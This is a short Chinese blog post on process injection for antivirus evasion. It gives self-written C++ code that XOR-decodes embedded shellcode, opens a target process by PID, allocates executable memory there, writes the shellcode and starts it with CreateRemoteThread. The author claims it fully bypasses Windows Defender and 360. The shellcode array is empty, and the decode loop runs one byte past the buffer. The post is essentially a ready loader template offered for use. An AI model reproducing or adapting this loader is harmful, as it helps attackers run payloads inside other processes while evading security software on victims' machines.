进程注入免杀学习

进程注入免杀学习

下面是自写的进程注入代码，已经对主要代码进行注释，相关函数如有不懂请查看官方文档，windows defend ,360全程免杀。

案例

#include <iostream>
#include <windows.h>

int main(int argc, char* argv[])
{
	//unsigned char KEY = 10;				
	unsigned char shellcode[] ="";			//xor加密后的shellcode
	//unsigned char en_shellcode[] = "";
	//int n = 0;

	HANDLE processHandle;
	HANDLE remoteThread;		
	PVOID remoteBuffer;

	for (int i = 0; i <= sizeof(shellcode); i++) {
		shellcode[i] ^= 10;					////10为xor加密key
	}
	/*
	 *输入要注入的pid
	 *打开注入进程
	 *把shellcode写入内存
	 *把数据写入进程
	 *创建线程
	 *关闭注入的进程句柄
	*/
	printf("Injecting to PID: %i", atoi(argv[1]));		
	processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
	remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
	remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
	CloseHandle(processHandle);
	return 0;
}